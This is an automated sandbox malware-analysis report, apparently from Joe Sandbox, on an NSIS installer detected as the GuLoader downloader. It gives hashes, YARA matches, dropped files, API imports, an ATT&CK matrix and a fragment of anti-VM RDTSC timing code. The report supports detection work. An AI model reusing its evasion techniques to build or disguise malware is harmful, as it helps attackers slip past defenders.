Windows Analysis Report
SC.028UCCP.exe

Overview

General Information

Sample Name:SC.028UCCP.exe
Analysis ID:830301
MD5:3f8f4a7f43b5627ed45128bb99f0b471
SHA1:1c1931fe8db9b5df89d39e3121fa72c2a355ded1
SHA256:0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
Tags:exe, signed
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
Uses 32bit PE files
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • SC.028UCCP.exe (PID: 5928 cmdline: C:\Users\user\Desktop\SC.028UCCP.exe MD5: 3F8F4A7F43B5627ED45128BB99F0B471)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.782049027.00000000005D0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
00000000.00000002.782394015.0000000002B00000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000000.00000002.782394015.000000000400D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
          No Sigma rule has matched
          No Snort rule has matched

          AV Detection

          Source: SC.028UCCP.exe | ReversingLabs: Detection: 33%
          Source: SC.028UCCP.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405475
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_0040264F FindFirstFileA,0_2_0040264F
          Source: SC.028UCCP.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SC.028UCCP.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: SC.028UCCP.exe | String found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: SC.028UCCP.exe | String found in binary or memory: http://s.symcd.com06
          Source: SC.028UCCP.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: SC.028UCCP.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: SC.028UCCP.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: SC.028UCCP.exe | String found in binary or memory: https://d.symcb.com/cps0%
          Source: SC.028UCCP.exe | String found in binary or memory: https://d.symcb.com/rpa0
          Source: SC.028UCCP.exe | String found in binary or memory: https://d.symcb.com/rpa0.
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00404FE3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FE3
          Source: SC.028UCCP.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040310B
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00404822,0_2_00404822
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_004062C3,0_2_004062C3
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00406A9A,0_2_00406A9A
          Source: SC.028UCCP.exe | Static PE information: invalid certificate
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Process Stats: CPU usage > 98%
          Source: SC.028UCCP.exe | ReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | File read: C:\Users\user\Desktop\SC.028UCCP.exe
          Source: SC.028UCCP.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | File created: C:\Users\user\Documents\Snarer.ini
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | File created: C:\Users\user\AppData\Local\Temp\nstD527.tmp
          Source: classification engine | Classification label: mal76.troj.evad.winEXE@1/4@0/0
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_004042E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042E6

          Data Obfuscation

          Source: Yara match | File source: 00000000.00000002.782394015.000000000400D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.782394015.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, type: DROPPED
          Source: Yara match | File source: 00000000.00000002.782049027.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_10002CE0 push eax; ret 0_2_10002D0E
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EC3
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | File created: C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\SC.028UCCP.exe | RDTSC instruction interceptor: First address: 00000000041F6C3D second address: 00000000041F6C3D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FB3B0BEAC3Fh 0x00000006 cmp esi, F36905EDh 0x0000000c test edx, ebx 0x0000000e inc ebp 0x0000000f test bl, cl 0x00000011 inc ebx 0x00000012 pushad 0x00000013 mov di, 3123h 0x00000017 cmp di, 3123h 0x0000001c jne 00007FB3B0BEDC0Ah 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405475
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00405E9C FindFirstFileA,FindClose,0_2_00405E9C
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_0040264F FindFirstFileA,0_2_0040264F
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | API call chain: ExitProcess graph end node,graph_0-4045
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | API call chain: ExitProcess graph end node,graph_0-4206
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00405EC3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EC3
          Source: C:\Users\user\Desktop\SC.028UCCP.exe | Code function: 0_2_00405BBA GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BBA
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | 13 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Source | Detection | Scanner | Label | Link
          SC.028UCCP.exe | 33% | ReversingLabs | Win32.Trojan.Generic |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll | 0% | ReversingLabs | |

          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No contacted domains info

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nsis.sf.net/NSIS_Error | SC.028UCCP.exe | false | | high
          http://nsis.sf.net/NSIS_ErrorError | SC.028UCCP.exe | false | | high

          No contacted IP infos
              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830301
              Start date and time:2023-03-20 08:44:20 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 28s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:15
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:SC.028UCCP.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@1/4@0/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 60.4% (good quality ratio 59%)
              • Quality average: 87%
              • Quality standard deviation: 23.1%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 44
              • Number of non-executed functions: 33
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for sample files taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: SC.028UCCP.exe
              No simulations
              No context
              No context
              No context
              No context
              Match | Associated Sample Name / URL | Detection | Threat Name
              C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll | file.exe | malicious | Fabookie, ManusCrypt, Nitol, Nymaim, RHADAMANTHYS, Socelars, lgoogLoader
              | file.exe | malicious | Fabookie, ManusCrypt, Nitol, Nymaim, RHADAMANTHYS, RedLine, Socelars
              | vWWBb6OiKq.exe | malicious | Fabookie, ManusCrypt, Nymaim, RHADAMANTHYS, Socelars, lgoogLoader
              | PO 2300479-MEDPHARM.exe | malicious | FormBook, GuLoader
              | MCME PO - 5700303364.exe | malicious | AgentTesla, GuLoader
              | PO 2300479-MEDPHARM.exe | malicious | GuLoader
              | MCME PO - 5700303364.exe | malicious | GuLoader
              | jpmm-desktop-external-installer.exe | malicious |
              | VisualBeeInstall.exe | malicious |
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):268768
                                Entropy (8bit):7.143396451103385
                                Encrypted:false
                                SSDEEP:6144:qJAA/mPgVn081S1KOqpIrh02aq18CUcmQd:TA/moVw1HP02J8CUcVd
                                MD5:C6AF2E59D4C09946D5F809241D770F50
                                SHA1:266B1073C52D94E9451AA08B2605F2237E5F8A0C
                                SHA-256:89E42F99BB457998B2FA3A4D0973ABFE9A39163227F56C8D000CCE44F1EF0070
                                SHA-512:B005D4324152790A8BDAAAEE6272A899639FF8D5E1E1FFE1E1219C569F9D271C4A21440F709CA3693A5F80A664501D3AB79EBA81B5B9D07C8870FE5AC15D5124
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\Patter.Lam, Author: Joe Security
                                Reputation:low
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, components 3
                                Category:dropped
                                Size (bytes):5717
                                Entropy (8bit):7.862470085974542
                                Encrypted:false
                                SSDEEP:96:BSTzREom7JPxQ7OTst5UcVq9JD6EgZEoW249KONYq9iwry9t1Bs6UQJaE424CZ:oXRgtPEOa6+q65Zr87YXwry9tzuCZ
                                MD5:B182207A878FA708746DA5A94F08A581
                                SHA1:4EF329C2643A9B5E19F491D644A96EF3E7388BE6
                                SHA-256:40125E69AA66C655FA44F83BBDEB7E9F24FE81D69CC717651A42C908483FF687
                                SHA-512:2368E6533A4D660C08C6F196F38CE2F706C8486AA9E5B1C2413988251184D6A928A348E74DDF0FB098F928D7FCFA4DD71829766E1964E3E5085D642497D034B4
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:GTA audio index data (SDT)
                                Category:dropped
                                Size (bytes):42868
                                Entropy (8bit):4.531239376712852
                                Encrypted:false
                                SSDEEP:768:BmzeD2YSUGt8UN3/hCwqfWCixEmPmXZNIYmhaspQZV:BF9SfyUNvrxEmMAHpQT
                                MD5:545F37C048EB23C04FF82F592FB89DEB
                                SHA1:9ED7C0D724A7A1C7E38F2A5134D1325B49FCCF25
                                SHA-256:DA3CADFEE6D3939C607B6F60B12861931ABD8E7441A2C148C396A38957C7D4DF
                                SHA-512:0EB46B15043855818821DD3C60A491E83DF943A30E3BC57E9D37F81AAFF697DFFEF94CE8874A1F61E1E93B7BA2FD740E4FAF7E267BFB1B5B708F1979ED292655
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\SC.028UCCP.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):11264
                                Entropy (8bit):5.72460245623286
                                Encrypted:false
                                SSDEEP:96:3IsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9oug:YVL7ikJb76BQUoUm+RnyXVYO2RvHoug
                                MD5:CF85183B87314359488B850F9E97A698
                                SHA1:6B6C790037EEC7EBEA4D05590359CB4473F19AEA
                                SHA-256:3B6A5CB2A3C091814FCE297C04FB677F72732FB21615102C62A195FDC2E7DFAC
                                SHA-512:FE484B3FC89AEED3A6B71B90B90EA11A787697E56BE3077154B6DDC2646850F6C38589ED422FF792E391638A80A778D33F22E891E76B5D65896C6FB4696A2C3B
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: file.exe, Detection: malicious, Browse
                                • Filename: file.exe, Detection: malicious, Browse
                                • Filename: vWWBb6OiKq.exe, Detection: malicious, Browse
                                • Filename: PO 2300479-MEDPHARM.exe, Detection: malicious, Browse
                                • Filename: MCME PO - 5700303364.exe, Detection: malicious, Browse
                                • Filename: PO 2300479-MEDPHARM.exe, Detection: malicious, Browse
                                • Filename: MCME PO - 5700303364.exe, Detection: malicious, Browse
                                • Filename: jpmm-desktop-external-installer.exe, Detection: malicious, Browse
                                • Filename: VisualBeeInstall.exe, Detection: malicious, Browse
                                Reputation:moderate, very likely benign file
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.920107350850815
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:SC.028UCCP.exe
                                File size:267392
                                MD5:3f8f4a7f43b5627ed45128bb99f0b471
                                SHA1:1c1931fe8db9b5df89d39e3121fa72c2a355ded1
                                SHA256:0ae741990942bc5b9a51a72dc1cc9f2197b8fe140b76eee9170c3260c00e8656
                                SHA512:800a88ff5985f832c73fbada7fa71175531dbe9bd47a93bc8941817e791d8868cfedd4dad2f82604ce06e1e2136821b963d35e23d580edf2d260475eb213ff6f
                                SSDEEP:6144:4auq7FPth0P6iM7EFsjSHR58yQITE1vE1P57hO5FKHJa:HFPr0SirFjC1yP5NO5FKg
                                TLSH:AE4412172BE645FFF9D78C72103AEAB3F5BBE6580817144E0B266F7A7D00603092969D
                                Icon Hash:b2a88c96b2ca6a72
                                Entrypoint:0x40310b
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x51E3058F [Sun Jul 14 20:09:51 2013 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                                Signature Valid:false
                                Signature Issuer:E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                Error Number:-2146762487
                                Not Before, Not After
                                • 8/19/2022 10:31:00 PM 8/18/2025 10:31:00 PM
                                Subject Chain
                                • E=synsmaades@Lakeside.Fo, OU="Virksomhedsledelsens Tensionerne ", O=Draconis, L=Saint-Projet, S=Nouvelle-Aquitaine, C=FR
                                Version:3
                                Thumbprint MD5:82A2F162C13C97C7C5BD9D1EF5E3E352
                                Thumbprint SHA-1:0A4EF0B597133BD21B48A5030DE4541818CB48DA
                                Thumbprint SHA-256:9B7EDD84EF52310C29E72A78ED7E0EB44C977D6DE7359675C1845C3D1CD29EBC
                                Serial:3E36636B7C2A21B05072BFF828C9540A74C9C941
                                Instruction
                                sub esp, 00000184h
                                push ebx
                                push ebp
                                push esi
                                xor ebx, ebx
                                push edi
                                mov dword ptr [esp+18h], ebx
                                mov dword ptr [esp+10h], 00409190h
                                mov dword ptr [esp+20h], ebx
                                mov byte ptr [esp+14h], 00000020h
                                call dword ptr [00407034h]
                                push 00008001h
                                call dword ptr [004070B0h]
                                push ebx
                                call dword ptr [0040728Ch]
                                push 00000008h
                                mov dword ptr [0042EC58h], eax
                                call 00007FB3B0AB27D8h
                                mov dword ptr [0042EBA4h], eax
                                push ebx
                                lea eax, dword ptr [esp+38h]
                                push 00000160h
                                push eax
                                push ebx
                                push 00428FE0h
                                call dword ptr [00407164h]
                                push 00409180h
                                push 0042E3A0h
                                call 00007FB3B0AB2482h
                                call dword ptr [0040711Ch]
                                mov ebp, 00434000h
                                push eax
                                push ebp
                                call 00007FB3B0AB2470h
                                push ebx
                                call dword ptr [00407114h]
                                cmp byte ptr [00434000h], 00000022h
                                mov dword ptr [0042EBA0h], eax
                                mov eax, ebp
                                jne 00007FB3B0AAFA6Ch
                                mov byte ptr [esp+14h], 00000022h
                                mov eax, 00434001h
                                push dword ptr [esp+14h]
                                push eax
                                call 00007FB3B0AB1F1Dh
                                push eax
                                call dword ptr [00407220h]
                                mov dword ptr [esp+1Ch], eax
                                jmp 00007FB3B0AAFB25h
                                cmp cl, 00000020h
                                jne 00007FB3B0AAFA68h
                                inc eax
                                cmp byte ptr [eax], 00000020h
                                je 00007FB3B0AAFA5Ch
                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x10b0 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3fc20 | 0x1860 | .ndata
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x5de8 | 0x5e00 | False | 0.6791057180851063 | data | 6.503326078284377 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata | 0x7000 | 0x12da | 0x1400 | False | 0.4388671875 | data | 5.095966873256735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0x9000 | 0x25c98 | 0x400 | False | 0.63671875 | data | 5.037907617207934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata | 0x2f000 | 0x15000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x44000 | 0x10b0 | 0x1200 | False | 0.3513454861111111 | data | 4.2798158371727295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country
                                RT_BITMAP | 0x44238 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States
                                RT_ICON | 0x445a0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
                                RT_DIALOG | 0x44888 | 0x144 | data | English | United States
                                RT_DIALOG | 0x449d0 | 0x13c | data | English | United States
                                RT_DIALOG | 0x44b10 | 0x100 | data | English | United States
                                RT_DIALOG | 0x44c10 | 0x11c | data | English | United States
                                RT_DIALOG | 0x44d30 | 0x60 | data | English | United States
                                RT_GROUP_ICON | 0x44d90 | 0x14 | data | English | United States
                                RT_MANIFEST | 0x44da8 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States
                                DLL | Import
                                KERNEL32.dll | Sleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                Language of compilation system | Country where language is spoken | Map
                                English | United States |
                                Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.


                                Target ID:0
                                Start time:08:45:18
                                Start date:20/03/2023
                                Path:C:\Users\user\Desktop\SC.028UCCP.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\SC.028UCCP.exe
                                Imagebase:0x400000
                                File size:267392 bytes
                                MD5 hash:3F8F4A7F43B5627ED45128BB99F0B471
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
